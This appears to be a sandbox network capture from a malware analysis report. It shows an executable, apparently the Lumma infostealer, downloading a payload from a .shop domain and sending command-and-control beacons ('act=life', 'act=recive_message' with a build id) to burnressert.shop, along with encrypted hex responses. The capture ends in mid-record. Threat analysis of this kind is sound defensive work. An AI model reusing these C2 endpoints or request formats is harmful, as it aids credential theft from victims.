HTTP Request Dependency Graph

u1.grapplereturnunstamped.shop

burnressert.shop

cegu.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	104.21.78.33	443	6348	C:\Users\user\Desktop\lummm_lzmb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 16:25:00 UTC	214	OUT	GET /iqqhm.dat HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Host: u1.grapplereturnunstamped.shop Connection: Keep-Alive
2025-01-15 16:25:01 UTC	902	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 16:25:00 GMT Content-Length: 1184776 Connection: close Accept-Ranges: bytes ETag: "c1fe820c9f000dcabf678cac02d15a61" Last-Modified: Wed, 15 Jan 2025 09:14:21 GMT Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ykw7ag56lFIl3eHSVZKDZQRaK81rGj90NLI6SwrUEdrF7OZVM9AQM74divSLXAn7h7wakhcjLhHIWyZUMwuAQGynrp%2FWg%2Fs005ZlpByOoliSImhubj5gYFXt2QOGSjJcmdzn1nE%2F5KHnNY%2FqLQfRB%2FI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902738238ecea304-YUL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=17860&min_rtt=17835&rtt_var=6740&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2879&recv_bytes=828&delivery_rate=161844&cwnd=32&unsent_bytes=0&cid=e84c00b2b2d59b6f&ts=412&x=0"
2025-01-15 16:25:01 UTC	467	IN	Data Raw: e3 ec 8e 4a 97 c7 fb 09 fa cd 07 a0 4b af 1e 51 c4 54 b4 30 bb b9 2d bf 90 17 0c 48 f0 b2 0f 10 7d 2d 94 81 32 ca f4 bd 67 0b f0 56 49 f4 75 3f 74 cf 2e c0 e4 5c f8 2e 5e 84 dc ca 68 bd 22 9b 24 73 1a d7 73 66 33 96 bf 03 f0 12 30 df ec 33 1d 12 43 cb fd f0 1a aa 70 72 8f b8 53 a4 8f 0a 71 97 d2 f1 26 41 b3 8e aa 37 86 1b ae 08 75 40 bb 77 1f c0 c0 cb 63 f5 62 c7 3c 19 c7 bb d7 38 83 6e e9 6b af b9 56 09 74 21 2c 99 31 b7 90 85 d1 8f 3b de 29 05 32 6d 63 3f 37 d0 66 a6 74 73 f8 a6 91 e4 a0 16 1a 32 00 44 e3 7c 5c 8e 2a 75 50 31 2c 8f 27 83 8c 1c d6 be 69 dd 07 55 2f 54 7e 55 6e 25 c7 8f 6f 57 21 4e b3 f4 63 03 64 50 00 67 65 8a 9a 4d cd 6e 45 a9 22 c5 f6 d2 46 77 64 8a a5 e9 18 a8 21 b9 ab 2e b7 01 63 75 84 e1 25 46 53 dc e0 63 1f a1 fb af c4 43 ee 43 07 Data Ascii: JKQT0-H}-2gVIu?t.\.^h"$ssf303CprSq&A7u@wcb<8nkVt!,1;)2mc?7fts2D\|\*uP1,'iU/T~Un%oW!NcdPgeMnE"Fwd!.cu%FScCC
2025-01-15 16:25:01 UTC	1369	IN	Data Raw: 76 d9 16 c1 fe 5d da 32 72 d7 c4 1a 7f 9a 91 2a 8e e8 85 90 e1 1c fe 80 db 9c df d4 cc 84 8a 02 f5 b2 54 e3 b6 5e 4c 1f 39 c4 e3 84 d5 37 5a 4e ea f0 ac 85 3a 7c 9b da a4 fa 49 6d 1f 11 cc 79 57 3a d4 ac 33 58 12 03 40 c0 68 40 9e e7 a2 52 47 80 62 8e 1b d4 b8 ed 81 a3 f4 49 9d 22 87 6c 85 d5 c1 5f 30 5d 9b a6 34 a1 a6 1c 6d 79 7a fb b1 9a 42 13 1f 71 5c cf 3e c2 a1 37 f7 2a 14 24 1d 8e 56 9d 04 9e e4 2d 1d a7 63 b8 79 3a 36 e6 3f 09 77 3a b7 bf 2f fd 74 69 82 02 6f 8c ab 5e f3 2f 16 5f 2b 1b 1d 7a 68 5e 2e 7e 94 56 0e 25 5c 21 41 4c ba 2b ae a7 0c 24 c1 ea b8 bc 73 75 1a cd 9a d2 1c 84 30 7f 4a 3e a2 9b 25 70 58 1b c5 48 82 f0 29 92 4d 85 58 5d a6 17 0c f1 c8 ba d4 22 da bc 5a 66 6e 41 6d bc 38 df 4d ea 49 d5 89 a2 a2 6c 95 a5 c3 0a cd 2a 9d ea 7b e7 10 Data Ascii: v]2rT^L97ZN:\|ImyW:3X@h@RGbI"l_0]4myzBq\>7$V-cy:6?w:/tio^/_+zh^.~V%\!AL+$su0J>%pXH)MX]"ZfnAm8MIl*{
2025-01-15 16:25:01 UTC	1369	IN	Data Raw: 5f 51 b3 8f 9a f5 ec aa 5c 32 46 73 f0 97 8e cf 8e eb b0 b3 d8 09 d6 d9 0f 2f 71 73 fe 80 b8 a3 1d 65 5c 81 96 19 10 13 54 0c 78 50 0f 57 b7 3a 28 60 65 5e 40 b0 35 03 e8 4b b7 61 25 05 81 ee e5 40 7b f6 1f d5 b7 b8 9b c5 7d fa d8 6f 57 3d d8 d2 7b 7f 8f 8f 45 2e 15 b5 e5 cd 0b a5 f0 2b 60 8c 53 f0 f5 36 0c 9d 31 2f df 92 8e 4d d1 b6 1c 91 27 30 52 51 f1 42 c2 f4 43 0f fe 17 70 3a 7d a7 74 87 2b c2 67 3c fb 01 3b 8f e6 91 b2 19 14 0c 55 89 57 83 db e4 08 f5 34 42 3a 86 e2 67 35 5a 8f e1 40 5f 9a 96 c1 cc ff 99 79 a3 2f 8b e1 64 d1 2c 40 ed ab 7b de c7 e6 dc dd 03 90 5b 5f 00 25 5a ed 41 f4 ca 0e 62 6f 0d d2 dd ad c8 b1 72 6e f0 80 f3 99 2e 4e 9f 13 a5 f6 d2 45 6f 7d 17 8f 93 e8 24 09 58 b7 94 de 3b b0 54 ea 22 40 a4 04 8c 96 58 dc 14 e8 49 3c 1a b5 46 6f Data Ascii: _Q\2Fs/qse\TxPW:(`e^@5Ka%@{}oW={E.+`S61/M'0RQBCp:}t+g<;UW4B:g5Z@_y/d,@{[_%ZAborn.NEo}$X;T"@XI<Fo
2025-01-15 16:25:01 UTC	1369	IN	Data Raw: 2a 3e 2e 29 ee 40 ad 05 b3 0c d9 f7 ea 14 7e 30 e5 5b 82 c0 96 cb 5c 6b 63 52 36 46 d8 4c fb 7d b6 b0 20 84 f6 cf c9 be 85 2f d5 7b af 39 8e 80 1a 8d 16 e0 d4 b5 54 7a ca 53 bb 28 a1 a3 6f 24 89 f5 89 9c 37 4e 0a 70 34 21 c5 50 3b 14 d0 23 d8 c5 6c b5 6b 60 57 10 7b 80 52 e1 b9 a7 16 7c 6a 1e dd 48 33 f9 ef 03 2a ad dd ef af 9e 69 23 cf a6 68 78 26 48 62 ca 49 19 19 3b f1 f1 7c b9 4e 7c 2b 51 ee c3 ca 1f 60 79 4b e7 2c 66 3c 77 11 68 ef 0b 11 cd 48 86 94 1a c9 56 77 fa 76 9f cd f3 e4 a6 94 3f b9 f3 12 00 4c c1 0d 2e fb ab 26 06 3b 9f 9a 4a 38 82 a7 ac 0f 7c 01 19 2d be 38 0c 2d dc ed 98 dc f4 e7 9f 0c 67 5f 4e c4 81 43 9a bc 40 df a0 91 d8 6c 23 37 32 f9 a1 40 ec 49 65 b5 97 7e b6 b0 31 e2 cc 8d 09 ea d2 8f c9 64 d0 bd 27 9e 13 56 ea 86 9e 10 d3 ea 70 f5 Data Ascii: >.)@~0[\kcR6FL} /{9TzS(o$7Np4!P;#lk`W{R\|jH3i#hx&HbI;\|N\|+Q`yK,f<whHVwv?L.&;J8\|-8-g_NC@l#72@Ie~1d'Vp
2025-01-15 16:25:01 UTC	1369	IN	Data Raw: 48 19 a2 91 35 5e 44 db 6d 54 3a a3 78 bc 66 87 3d a8 96 b0 72 b9 ad 09 a3 57 81 18 c9 59 19 12 e4 a6 3e 04 ff 41 b3 cd 9b 17 38 78 a1 5e 4f 03 b0 7b 32 f7 01 f3 49 35 2d bd 14 ad 04 2a 5f 22 a3 c7 0a e1 b0 69 27 f7 58 c8 d3 b9 28 7a 3a ca 36 2e 54 ee d6 06 a3 0a c1 90 f6 b0 70 5f 22 4b 66 0d 8c a1 23 a0 ab 50 70 3d 4f c7 e5 05 24 8d d2 0e 57 d0 a1 ed 47 83 75 99 29 e4 6a e1 85 c1 8a 50 4c f3 2c d1 6a 1e 1d d2 0f b4 97 6c cf 3b f9 5e 0f 07 3d d2 bc 6f 86 8a 43 b2 c9 f7 c8 e6 91 d2 cf b2 15 5b 90 40 83 15 cf cd 46 f9 40 84 0a b7 6a 3f 5c 6a cf b5 9e 3a 3d ba 3d 2d 84 99 6e 0a c7 00 f0 47 8d 45 c3 88 d7 d4 df 27 ef 52 32 8d c9 0b 42 2f 3c cf da 23 8a c1 b7 97 4b 55 10 61 c2 0e bb 07 f7 28 80 cd b9 95 53 33 a1 41 81 ce 07 1b 31 be fc af 60 e5 2d 4a 75 6a 54 Data Ascii: H5^DmT:xf=rWY>A8x^O{2I5-*_"i'X(z:6.Tp_"Kf#Pp=O$WGu)jPL,jl;^=oC[@F@j?\j:==-nGE'R2B/<#KUa(S3A1`-JujT
2025-01-15 16:25:01 UTC	1369	IN	Data Raw: 93 27 9d 46 8f 74 1d 06 a3 e9 19 4d 19 74 08 d3 68 68 d2 6e 01 c0 ac 58 6f c3 ec 18 d2 e7 9b 77 0c 58 ce be ac 06 05 f6 1b 6e 96 96 07 18 9f 8b f2 7a 59 5c 1e 80 9e da ac ea 32 0e 8d ab b1 b3 a4 d2 a8 f1 65 5d 6d 52 0c 7f 5e 99 5f b1 c7 c0 aa 66 83 08 fb cc 6e ba 0a dc d9 51 b9 17 79 ac 63 17 64 71 94 1a 68 f7 68 ad c5 ac f9 7a a1 5e 99 d4 79 9d d6 74 72 c6 43 14 51 f2 26 46 77 12 c5 5f 55 dd e1 ad 2a 99 4c 36 01 98 79 40 e2 89 40 06 b1 4a 70 16 a9 2d 67 da 1f e1 6b 4e bf 2e e0 cd 9f 7b ea c3 04 46 c3 8f cc 32 36 8f 7b fb d8 26 bf 74 5f 0e b2 aa 23 c0 82 0c a3 70 40 02 23 0c 1a 4d 31 67 ea 7d 64 2d f5 3c 5b be af 8f 64 2f df e5 e1 7c 73 04 23 41 37 f3 de f0 4f 9f 1a 43 92 f0 00 62 ce 62 f6 0d ad 30 d3 62 23 78 dc 1e 58 e5 19 b4 13 08 2a dd 93 a4 6f d8 b4 Data Ascii: 'FtMthhnXowXnzY\2e]mR^_fnQycdqhhz^ytrCQ&Fw_UL6y@@Jp-gkN.{F26{&t_#p@#M1g}d-<[d/\|s#A7OCbb0b#xXo
2025-01-15 16:25:01 UTC	1369	IN	Data Raw: a6 c1 ca 85 bf a4 01 b8 c4 bb b6 aa f7 23 49 5b 64 82 ac 3c 44 25 78 8b 3c 67 23 a4 dd 1e 76 a2 86 d1 e8 d6 e1 c8 98 5f 74 fc 36 fc ab ac 4f 12 fa bd 57 ea 4c 54 86 01 17 a9 23 9a 23 d7 a0 77 d6 4d 02 6c 80 84 26 26 8e 22 e6 73 8e 88 48 30 ce 6b 27 2d 14 e8 30 f0 42 80 42 c3 6e 62 7b 0f 13 82 98 9e 9a a8 c1 f4 4f c8 60 e9 df eb e1 ec ba 06 81 0d 79 92 b1 d6 87 e1 36 ec 2f 67 6b 45 b3 e0 50 b0 60 aa 99 a9 ff ed d6 87 65 93 94 f0 cd 40 40 74 d4 67 33 88 de a5 a7 af eb df 52 1b 56 74 b0 fb fa 31 2f 21 30 80 b7 dd 81 7d d7 87 76 98 9f 57 05 93 25 f3 25 75 3c f9 ef 88 d1 4b 98 b7 4a 4e 37 cd e5 01 ba 90 5f 7a 12 e8 7a 81 db 00 c9 70 20 8c 0e 69 98 bf cb 30 56 65 40 b1 f1 cc b6 3e c6 85 9e 64 07 72 e3 8c 4b 92 c2 e9 62 ae a3 02 60 03 b6 36 72 68 65 05 c1 44 8d Data Ascii: #I[d<D%x<g#v_t6OWLT##wMl&&"sH0k'-0BBnb{O`y6/gkEP`e@@tg3RVt1/!0}vW%%u<KJN7_zzp i0Ve@>drKb`6rheD
2025-01-15 16:25:01 UTC	1369	IN	Data Raw: 0f be 38 dc 36 7a 4e cc 32 5f e7 ae ed 59 ac 8c 92 89 db a5 71 63 86 be 26 b6 dd a9 31 6a 51 de 35 6c 29 b7 9a 83 63 34 9d d2 94 9e 48 23 32 b0 64 c8 10 dd 60 72 39 ca 60 1f 45 25 3f 5f 89 bc bb 5d fe 5e c3 2c 24 c4 cf db 15 14 39 53 3e b5 9f 3e 09 88 62 c5 32 16 a7 c0 d1 f7 1e 38 c4 5b c1 bd 8e 43 0c 89 dd 3e fc b4 e4 cb d8 b2 65 1b d2 0c 7e 49 58 24 cc 71 90 bb 9e e3 76 36 f3 30 91 ba 18 46 93 e5 17 d5 30 c2 ab 73 83 ea d3 c5 31 39 98 12 25 c3 58 da f1 f6 1f 8b 89 5c d2 e4 70 4d cc 1a a4 b8 6e 0a d7 a5 0e 41 f4 10 2e bd d1 3c f3 bd 8d 0f c5 45 bb 87 29 d9 9e 98 40 09 2e 07 6b 4a f2 5a 8a a6 5f ad 02 b3 5f 39 96 c8 82 b7 31 72 2a e4 b4 59 2a 01 07 ef 3e f9 26 c5 22 32 5c a6 d5 54 17 94 b7 ce 71 10 93 19 fb 62 d6 96 38 fe ea 2c 3d ef a2 1e 79 4c 5a 63 7d Data Ascii: 86zN2_Yqc&1jQ5l)c4H#2d`r9`E%?_]^,$9S>>b28[C>e~IX$qv60F0s19%X\pMnA.<E)@.kJZ__91rY>&"2\Tqb8,=yLZc}
2025-01-15 16:25:01 UTC	1369	IN	Data Raw: 53 56 b5 b8 c2 b3 0d 5a 0e 30 41 1d 1b 25 20 1d e9 d0 90 db d4 7a e2 27 2a 9d f2 b2 f9 4d 8c 06 95 e6 b3 7f d0 d0 70 ae bd 1e 2e 96 1f 80 5f 59 a6 7e 2e af cc b2 53 03 d6 89 61 13 b1 d5 d0 47 8f ff 8c 93 c5 ab b7 24 a5 1f f5 bc 91 24 a8 eb 78 8c 6f e6 e8 69 cc 7f e4 56 5c 27 37 5a 19 0a 56 4d 09 00 a3 e3 19 32 cd a7 5f 4a b7 11 cd 61 61 d8 fb eb d9 dd 2c 88 8e 60 df 12 4b 2b 26 cd f0 28 7c 6d d2 bc b6 c7 cd ca ed b3 60 f2 51 d5 22 43 4b e3 15 d5 c3 46 70 3d 25 dd fc 9b 1c 76 7b 7a 50 9a ae e6 e5 e2 70 4b 31 b3 7a c9 48 67 c9 38 86 ca 71 cb 6b d0 4a 9f 0c 46 fc 0d d2 b1 1f 95 1d bf de d6 9c 69 85 c9 ae 92 48 92 78 3c 6c db 4e 64 c0 fa c6 e2 73 b3 93 2a 1d a9 14 54 08 6c c2 9a 2f 4b 5e 94 ff b1 79 ee 44 80 bc d2 ca 89 1d b0 18 9b f5 77 99 ec 51 a9 93 56 f0 Data Ascii: SVZ0A% z'Mp._Y~.SaG$$xoiV\'7ZVM2_Jaa,`K+&(\|m`Q"CKFp=%v{zPpK1zHg8qkJFiHx<lNdsTl/K^yDwQV
2025-01-15 16:25:01 UTC	1369	IN	Data Raw: 15 bf 1a a7 06 4a a4 72 e0 86 e9 37 66 54 f8 55 c3 8e d5 54 aa 45 ad 48 9d 6e 21 2f ca 6b 85 d8 52 f1 e6 15 cf 7e 06 96 06 94 c3 31 89 ae 4d bc ce 8d d4 bf 13 6c e9 0b fc 5a 00 66 43 84 bb 32 4a 10 bf 79 1a 4a 8b 4d cd a2 1a c9 31 08 64 6f b8 bb 3a bc dc b6 40 96 44 89 13 01 0f 3c 28 f8 4d ee fc 8e 0d 8a 61 02 6d 77 60 f9 6a 04 b1 79 28 58 ad 1b 88 b9 2d 11 85 fe 9d 78 9c 27 cb a1 94 26 c2 6a 87 2a 40 ec 58 9e f6 e5 2b c4 e8 f0 e7 4e 17 07 8a 45 39 c3 7a d7 6b d4 40 5d 9e f9 8c 76 c9 22 2f a8 06 ab b5 2e 65 c8 97 3b 22 e3 1e 0d 2e 38 7a 2c 6e c3 3f 74 3c ef 55 6b 51 75 45 95 6d 7d b4 b6 62 4c fc cf fb ac 32 bd 82 89 9c cd 94 17 82 be 9e 05 2b b3 67 90 ce 07 86 97 6b 73 86 bd f8 39 50 b5 18 d9 cd db 46 cf 73 4a ef 64 e6 8d 26 5d 49 7c 9d ed 11 8c 55 b2 0c Data Ascii: Jr7fTUTEHn!/kR~1MlZfC2JyJM1do:@D<(Mamw`jy(X-x'&j*@X+NE9zk@]v"/.e;".8z,n?t<UkQuEm}bL2+gks9PFsJd&]I\|U

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	104.21.67.165	443	6780	C:\Users\user\Desktop\lummm_lzmb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 16:25:03 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: burnressert.shop
2025-01-15 16:25:03 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-01-15 16:25:04 UTC	1120	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 16:25:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=2tov0r71qt93fjhorttbeim2t3; expires=Sun, 11 May 2025 10:11:42 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lw8Ppt3cMJ0xeYUOCvTQstQRN1d8LZb8v4yqoVoIsa80%2FvEJ3W9DEKysVGRI03QLYOKDDg6a%2FZNpmxIVWiQx694bYAooxM5VM3iDcOLP43EEZTIR9NVjVrsbZ4pfvcASMh67"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902738360b7aaaf7-YYZ alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=14150&min_rtt=14139&rtt_var=5324&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=907&delivery_rate=205214&cwnd=32&unsent_bytes=0&cid=22a9abf2f44b04cc&ts=540&x=0"
2025-01-15 16:25:04 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2025-01-15 16:25:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	104.21.67.165	443	6780	C:\Users\user\Desktop\lummm_lzmb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 16:25:05 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 80 Host: burnressert.shop
2025-01-15 16:25:05 UTC	80	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 6a 4d 77 31 49 45 2d 2d 53 48 45 4c 4c 53 26 6a 3d 61 61 37 37 65 37 38 62 36 62 30 64 64 31 62 32 32 32 36 65 37 62 37 39 39 35 33 32 61 62 33 61 Data Ascii: act=recive_message&ver=4.0&lid=jMw1IE--SHELLS&j=aa77e78b6b0dd1b2226e7b799532ab3a
2025-01-15 16:25:05 UTC	1125	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 16:25:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=lf2lfc2144msv9o4c3dkumlna7; expires=Sun, 11 May 2025 10:11:44 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RWT9%2Bppu9ZJHZU25u7I9R%2BjBFJDhPcDAORuexGDkvuH9M26euodI4e5HAv0cSSrimxSpadI8RqJnTmy615NrNfmfOF6XcfW0ooNIlOPO8mXoqYNWx%2FrcAwvL2WGueE2%2FXPTW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902738414892ab6c-YYZ alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=14170&min_rtt=14077&rtt_var=5345&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=980&delivery_rate=207430&cwnd=32&unsent_bytes=0&cid=dccf0fa7ae63d155&ts=1314&x=0"
2025-01-15 16:25:05 UTC	244	IN	Data Raw: 31 63 39 62 0d 0a 44 66 62 70 73 39 4e 57 75 4a 56 2f 50 37 30 38 53 47 30 73 53 34 36 4a 4e 46 5a 5a 49 70 77 52 32 6b 62 4b 42 2b 51 76 48 74 68 32 31 4a 2b 52 36 57 4b 55 74 77 78 61 6e 77 59 75 44 45 41 34 36 36 55 57 4e 7a 30 41 70 6e 65 37 4b 72 6c 69 79 41 31 6f 74 53 2f 4d 6a 39 4b 2f 4a 64 32 35 58 56 72 46 48 6e 49 32 56 32 6e 72 35 78 5a 73 65 30 66 32 63 37 73 71 71 47 61 50 51 47 36 30 62 70 36 46 31 4c 73 7a 32 2f 45 65 55 39 42 5a 4c 51 68 4e 49 65 44 67 57 54 34 30 41 4c 41 7a 76 7a 7a 6f 50 63 5a 69 65 36 78 73 75 34 6a 41 75 48 54 46 75 51 51 64 32 46 4a 71 56 77 34 71 36 2b 74 59 4d 44 31 4a 39 48 6d 79 49 71 6c 6a 6a 6c 39 33 76 6d 57 65 69 39 65 36 4f 64 4c 6c 45 31 6e 58 55 69 73 43 54 57 6d 69 71 31 Data Ascii: 1c9bDfbps9NWuJV/P708SG0sS46JNFZZIpwR2kbKB+QvHth21J+R6WKUtwxanwYuDEA466UWNz0Apne7KrliyA1otS/Mj9K/Jd25XVrFHnI2V2nr5xZse0f2c7sqqGaPQG60bp6F1Lsz2/EeU9BZLQhNIeDgWT40ALAzvzzoPcZie6xsu4jAuHTFuQQd2FJqVw4q6+tYMD1J9HmyIqljjl93vmWei9e6OdLlE1nXUisCTWmiq1
2025-01-15 16:25:05 UTC	1369	IN	Data Raw: 45 73 65 78 69 2b 49 49 6f 6e 75 58 53 54 51 47 79 38 4c 34 76 46 79 50 45 7a 31 72 64 46 48 64 64 53 4a 41 70 4e 4a 75 76 71 56 69 59 30 51 50 31 37 73 43 43 69 61 6f 6c 43 63 72 42 6f 6e 49 4c 57 76 6a 50 53 38 52 4a 65 6e 78 42 71 43 46 5a 70 74 4b 74 32 4a 44 68 44 36 6e 36 70 5a 4c 63 72 6e 77 31 37 74 69 2f 4d 79 39 65 2f 4e 64 66 33 44 31 58 55 56 53 38 64 52 53 44 68 35 6c 59 35 4d 55 2f 39 63 37 38 75 6f 6d 71 4d 53 58 47 33 61 5a 53 4c 6b 66 39 30 33 65 39 64 42 5a 39 39 4c 78 39 4a 4a 66 71 70 62 48 51 6b 44 75 63 7a 76 79 6a 6f 50 63 5a 46 65 62 6c 73 6e 34 54 53 75 54 2f 49 39 77 39 62 30 6c 73 34 43 55 73 6e 35 75 68 45 50 6a 56 47 2f 58 71 7a 4c 61 31 69 67 67 30 79 2b 6d 69 4d 79 34 6e 78 46 64 66 38 45 56 66 49 58 6d 6f 51 41 44 43 73 37 Data Ascii: Esexi+IIonuXSTQGy8L4vFyPEz1rdFHddSJApNJuvqViY0QP17sCCiaolCcrBonILWvjPS8RJenxBqCFZptKt2JDhD6n6pZLcrnw17ti/My9e/Ndf3D1XUVS8dRSDh5lY5MU/9c78uomqMSXG3aZSLkf903e9dBZ99Lx9JJfqpbHQkDuczvyjoPcZFeblsn4TSuT/I9w9b0ls4CUsn5uhEPjVG/XqzLa1igg0y+miMy4nxFdf8EVfIXmoQADCs7
2025-01-15 16:25:05 UTC	1369	IN	Data Raw: 47 38 58 36 30 5a 4f 59 6c 67 56 55 38 34 69 2b 2b 69 4d 57 79 50 70 6a 43 48 6c 50 52 57 54 78 50 55 57 66 31 71 31 45 34 65 78 69 2b 66 72 6b 73 72 6e 65 4a 51 48 2b 30 59 5a 75 4f 33 72 6b 30 32 76 6f 59 57 64 52 56 4b 51 4a 4b 4f 2b 62 72 58 6a 45 36 53 76 51 7a 39 6d 53 76 66 63 59 56 50 49 74 34 6e 38 6e 6b 73 6a 72 55 38 41 73 64 77 42 41 7a 54 30 6b 6c 72 4c 4d 57 4f 54 4e 46 2b 33 79 35 4c 71 5a 67 6a 45 46 30 74 47 79 47 68 4e 57 78 4f 4e 4c 39 45 46 50 62 56 69 4d 45 52 53 2f 73 36 6c 78 30 64 51 44 35 61 2f 68 38 36 46 47 42 51 58 47 31 4c 61 47 49 33 37 38 7a 7a 4c 63 43 45 38 59 65 4c 51 4d 4f 63 61 7a 6e 58 7a 51 77 53 76 70 7a 76 79 6d 74 5a 6f 46 4f 63 62 31 6c 6d 6f 7a 56 76 54 33 58 38 52 31 61 32 31 73 34 43 6b 63 6c 34 4b 73 59 64 44 Data Ascii: G8X60ZOYlgVU84i++iMWyPpjCHlPRWTxPUWf1q1E4exi+frksrneJQH+0YZuO3rk02voYWdRVKQJKO+brXjE6SvQz9mSvfcYVPIt4n8nksjrU8AsdwBAzT0klrLMWOTNF+3y5LqZgjEF0tGyGhNWxONL9EFPbViMERS/s6lx0dQD5a/h86FGBQXG1LaGI378zzLcCE8YeLQMOcaznXzQwSvpzvymtZoFOcb1lmozVvT3X8R1a21s4Ckcl4KsYdD
2025-01-15 16:25:05 UTC	1369	IN	Data Raw: 6f 57 53 76 61 63 59 56 50 4c 4e 6d 68 6f 58 66 75 44 6e 63 2f 78 70 54 30 6c 55 73 42 45 6b 75 36 75 5a 65 4f 54 35 44 2f 33 65 79 4e 71 74 75 6a 45 42 32 2b 69 48 55 6a 4d 6e 78 62 4a 72 51 45 58 54 50 52 54 67 5a 44 6a 61 69 38 68 59 7a 4e 77 43 6d 4d 37 73 72 6f 57 71 4f 52 58 4f 31 61 35 71 4e 31 37 77 78 31 66 30 50 56 64 46 54 49 51 42 46 4f 2b 7a 6d 55 6a 67 2f 53 50 56 35 2b 47 72 6f 59 70 34 4e 4a 50 70 61 6d 59 54 52 73 69 4b 61 36 46 4e 45 6e 31 6b 6d 54 78 5a 70 34 4f 56 57 4f 7a 64 4d 39 58 75 35 4b 4b 5a 69 67 30 52 30 73 6e 32 56 6a 39 6d 77 4f 74 58 32 47 56 6a 61 57 69 30 4c 53 43 61 73 70 52 59 7a 49 77 43 6d 4d 35 63 44 6e 53 65 6e 64 7a 79 6c 49 59 33 4c 31 72 31 30 67 72 63 52 58 74 4e 57 4a 51 6c 48 4a 65 62 69 58 54 67 77 52 50 4a Data Ascii: oWSvacYVPLNmhoXfuDnc/xpT0lUsBEku6uZeOT5D/3eyNqtujEB2+iHUjMnxbJrQEXTPRTgZDjai8hYzNwCmM7sroWqORXO1a5qN17wx1f0PVdFTIQBFO+zmUjg/SPV5+GroYp4NJPpamYTRsiKa6FNEn1kmTxZp4OVWOzdM9Xu5KKZig0R0sn2Vj9mwOtX2GVjaWi0LSCaspRYzIwCmM5cDnSendzylIY3L1r10grcRXtNWJQlHJebiXTgwRPJ
2025-01-15 16:25:05 UTC	1369	IN	Data Raw: 32 53 48 53 32 36 39 5a 6f 61 46 33 4c 34 38 30 76 34 63 57 64 70 54 4c 41 4e 45 4b 4f 76 6c 57 44 78 37 44 72 35 30 6f 47 54 77 4a 61 64 64 5a 36 68 35 6d 61 72 63 76 6e 54 46 75 51 51 64 32 46 4a 71 56 77 34 67 2f 75 39 62 4a 6a 4a 48 38 48 79 37 4e 71 6c 6f 6a 56 39 37 74 57 75 54 68 39 65 2b 4d 74 76 79 46 31 48 59 57 79 45 41 51 6d 6d 69 71 31 45 73 65 78 69 2b 58 62 4d 33 76 32 61 49 52 6d 71 68 4c 34 76 46 79 50 45 7a 31 72 64 46 48 64 78 56 49 51 74 4f 4a 65 7a 76 57 7a 51 70 54 2f 6c 30 73 53 2b 36 62 34 46 4b 64 37 4a 6b 6d 34 33 44 76 54 72 49 38 67 39 50 6e 78 42 71 43 46 5a 70 74 4b 74 67 4d 79 74 51 2f 54 47 4a 4d 71 74 7a 6a 55 42 77 2b 6e 44 61 6b 70 47 32 4f 4a 71 76 58 56 76 51 56 79 6b 41 54 79 44 67 35 6c 4d 39 50 6b 48 34 64 37 49 75 Data Ascii: 